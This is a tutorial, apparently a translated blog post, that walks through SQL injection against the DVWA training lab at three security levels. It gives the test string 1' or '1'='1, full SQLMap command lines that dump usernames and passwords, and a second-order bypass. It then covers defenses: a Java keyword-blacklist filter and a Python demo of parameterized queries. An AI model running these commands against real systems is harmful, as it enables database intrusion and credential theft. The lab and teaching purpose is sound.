Preparation

Penetration tools: SQLMap, BurpSuite, Python 2.7 (to run SQLMap), the Firefox browser, and the FoxyProxy proxy plug-in for Firefox. On my side I simply installed PentestBox, which bundles the penetration tools and their runtime environment ready to run. The official download site is slow, so here is a Baidu cloud disk link: pan.baidu.com/s/1hMBUiVvN… Extraction code: 8OK5

Attack

I. Low level

Test for injection points using 1' or '1'='1

The injection clearly exists, so the URL can be handed straight to SQLMap.

SQLMap confirms the presence of Boolean-based blind, error-based, time-based blind and UNION-based injection. Now append the following options to the command above, one step at a time:

1. --dbs: enumerate the databases
2. -D <database> --tables: list all tables in that database
3. -D <database> -T <table> --columns: list all columns in the table
4. -D <database> -T <table> -C "field,field" --dump: dump the data held in those columns

The results are shown in the following figure

python .\sqlmap.py -u "http://192.168.199.177/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4q8en4tjvhcigke3l6drap3b54" --dbs

python .\sqlmap.py -u "http://192.168.199.177/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4q8en4tjvhcigke3l6drap3b54" -D dvwa --tables

python .\sqlmap.py -u "http://192.168.199.177/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4q8en4tjvhcigke3l6drap3b54" -D dvwa -T users --columns

python .\sqlmap.py -u "http://192.168.199.177/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4q8en4tjvhcigke3l6drap3b54" -D dvwa -T users -C "user,password" --dump

The user names and passwords have been obtained.

II. Medium level

At the medium level the front page uses a drop-down select form to constrain user input, so we use BurpSuite to intercept the request packet, modify it, and send the modified request on to the server. Start BurpSuite, configure FoxyProxy to forward requests to the local proxy on port 8080, and click Submit.

The string (quoted) injection failed, but the numeric injection succeeded.

Save the contents of the request packet to a TXT file; SQLMap can then run its injection tests directly against the saved request.

python .\sqlmap.py -r .\dvwa_medium.txt

The following steps are the same as at the Low level. The only difference is that at the Low level the database names, tables and other data are obtained through direct queries, whereas at the Medium level they are obtained by blind injection, in which the database names, table names and other information are recovered one character at a time.

III. High level

At the high level the page that submits the query is a different page from the one that displays the query result. The purpose of this is to defeat ordinary SQLMap injection: during the injection process SQLMap cannot see the query result on the submission page, and without that feedback it cannot proceed. This defense can be bypassed with --second-order, passing the URL of the page that displays the query results.

--second-order: used when the web application accepts input on one page and returns the result on a different page

Intercept the high-level submit request with BurpSuite, save it as a TXT file, and launch the SQL injection with the following command

python .\sqlmap.py -r .\dvwa_high.txt --second-order "http://192.168.199.177/dvwa/vulnerabilities/sqli/"

Boolean-based blind injection was detected successfully. The remaining steps are the same as at the medium level and are not repeated here.

Defense

Since I do back-end development and mostly use the Spring Boot framework, the precautions below are written for Spring projects, but the same principles apply to other back-end frameworks as well.

  • Use ${} with caution in MyBatis: it splices the argument into the SQL text without escaping or parameterizing it (use #{} instead, which binds the value as a prepared-statement parameter).
  • Use a Filter to check user requests and reject illegitimate ones.
import java.io.IOException;
import java.util.Map;
import java.util.regex.Pattern;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.annotation.WebFilter;
import javax.servlet.annotation.WebInitParam;
import javax.servlet.http.HttpServletRequest;
import lombok.extern.slf4j.Slf4j;
import org.springframework.stereotype.Component;

/**
 * SQL injection filter: rejects any request parameter that contains a token from a
 * SQL blacklist. A coarse second line of defense behind parameterized queries,
 * not a replacement for them.
 */
@Slf4j   // Lombok generates the `log` field used below
@Component
@WebFilter(urlPatterns = "/*", filterName = "SQLInjection",
        initParams = { @WebInitParam(name = "regx", value = SqlInjectFilter.DEFAULT_REGX) })
public class SqlInjectFilter implements Filter {

    /** Quotes, comment markers and common SQL keywords (keywords matched as whole words). */
    static final String DEFAULT_REGX =
            "(?:')|(?:--)|(/\\*(?:.|[\\n\\r])*?\\*/)|"
            + "(\\b(select|update|and|or|delete|insert|truncate|char|into|substr|ascii|declare"
            + "|exec|count|master|into|drop|execute)\\b)";

    private Pattern regx;

    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
        // @WebFilter initParams are only honoured under servlet component scanning; when the
        // filter is registered as a plain Spring bean the parameter is null, so fall back to
        // the built-in pattern. Compile once, case-insensitively, so SELECT and select both match.
        String configured = filterConfig.getInitParameter("regx");
        this.regx = Pattern.compile(configured != null ? configured : DEFAULT_REGX,
                Pattern.CASE_INSENSITIVE);
    }

    @Override
    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse,
                         FilterChain filterChain) throws IOException, ServletException {
        HttpServletRequest req = (HttpServletRequest) servletRequest;
        Map<String, String[]> parametersMap = servletRequest.getParameterMap();
        for (Map.Entry<String, String[]> entry : parametersMap.entrySet()) {
            for (String value : entry.getValue()) {
                // find() looks for the pattern anywhere in the value; String.matches() would
                // only fire when the whole value is a single blacklisted token.
                if (value != null && regx.matcher(value).find()) {
                    log.error("The parameter you entered has illegal characters, please enter the correct parameter!");
                    servletRequest.setAttribute("err",
                            "The parameter you entered has illegal characters, please enter the correct parameter!");
                    servletRequest.setAttribute("pageUrl", req.getRequestURI());
                    servletRequest.getRequestDispatcher(
                            servletRequest.getServletContext().getContextPath() + "/error")
                            .forward(servletRequest, servletResponse);
                    return;
                }
            }
        }
        filterChain.doFilter(servletRequest, servletResponse);
    }

    @Override
    public void destroy() {
    }
}
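To make the two defense bullets concrete, here is an added example of my own; it is not code from the original post, from DVWA, or from Spring/MyBatis. It builds an in-memory SQLite table shaped like DVWA's users table from constructed sample rows, runs the same lookup once by splicing the value into the SQL text (the DVWA low-level pattern) and once as a bound parameter (what MyBatis #{} and a JDBC PreparedStatement do), and runs the filter's blacklist regex over the same inputs. The table contents and the "Rock or Roll" input are constructed; Python's re.search plays the role of Java's Matcher.find(), and re.fullmatch the role of String.matches().

```python
"""Concatenated vs. parameterized lookup, plus the blacklist regex, on constructed data."""
import re
import sqlite3

# Constructed sample rows shaped like DVWA's users table (not real DVWA data).
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
    (4, "Pablo", "Picasso"),
    (5, "Bob", "Smith"),
]

# Blacklist from the servlet filter above, compiled case-insensitively.
BLACKLIST = re.compile(
    r"(?:')|(?:--)|(/\*(?:.|[\n\r])*?\*/)|"
    r"(\b(select|update|and|or|delete|insert|truncate|char|into|substr|ascii|declare|"
    r"exec|count|master|into|drop|execute)\b)",
    re.IGNORECASE,
)


def make_db():
    """In-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_concat(conn, user_id):
    """Vulnerable: the value becomes part of the SQL text (DVWA low-level pattern)."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    return conn.execute(sql).fetchall()


def lookup_param(conn, user_id):
    """Hardened: the value travels as a bound parameter and is never parsed as SQL.
    This is the behaviour of MyBatis #{} and of a JDBC PreparedStatement."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def blacklist_rejects(value):
    """Filter check as a search anywhere in the value (Java Matcher.find())."""
    return BLACKLIST.search(value) is not None


def blacklist_fullmatch_rejects(value):
    """Filter check as a whole-string match (Java String.matches()): only fires
    when the entire value is one blacklisted token."""
    return BLACKLIST.fullmatch(value) is not None


if __name__ == "__main__":
    db = make_db()
    payload = "1' or '1'='1"   # the test string used earlier in the post
    for label, value in (("benign", "1"), ("payload", payload), ("prose", "Rock or Roll")):
        print(label, "concat ->", len(lookup_concat(db, value)), "rows;",
              "param ->", len(lookup_param(db, value)), "rows;",
              "blacklist(search) ->", blacklist_rejects(value),
              "blacklist(fullmatch) ->", blacklist_fullmatch_rejects(value))
```

Running it shows the post's test string returning every row from the concatenated query and no row from the parameterized one, while the blacklist catches that string but also rejects harmless prose that merely contains the word "or". The fullmatch variant never trips on the test string at all, which is why a filter built on String.matches() needs to be switched to a find()-style search. Even then the blacklist stays a coarse second layer; the bound parameter is what actually keeps the input out of the SQL.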